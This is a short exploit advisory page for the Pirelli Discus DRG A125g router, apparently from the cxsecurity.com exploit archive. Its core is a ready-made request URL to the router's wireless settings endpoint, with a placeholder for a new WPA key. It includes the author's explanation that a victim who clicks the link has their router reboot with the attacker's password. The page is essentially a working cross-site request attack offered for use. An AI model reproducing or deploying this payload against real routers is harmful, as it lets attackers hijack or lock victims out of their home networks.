Pirelli Discus DRG A125g Remote Change WiFi Password Vulnerability

2013.11.24
Credit: Sebastian Magof
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Pirelli Discus DRG A125g remote change wifi password vulnerability # Hardware: Pirelli Discus DRG A125g # Date: 2013/11/23 # Exploit Author: Sebastin Magof # Tested on: Linux/Windows # Twitter: @smagof # Greetz: Family, friends && under guys. # Special Greetz: # (\/) # (**) αlpha #(")(") #Exploit: http://10.0.0.2/wladv.wl?wlSsidIdx=0&wlHide=0&wlAuthMode=psk2&wlAuth=0&wlWep=disabled&wlWpaPsk=PASSWORDHERE&wlWpaGtkRekey=0&wlKeyBit=1&wlPreauth=1&wlWpa=tkip #info: where the parameter wlWpaPsk=PASSWORDHERE is where we will enter the password we want to put the victim wifi. If the victim clicks on the url your modem / router will reboot automatically with the new password provided by the attacker.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top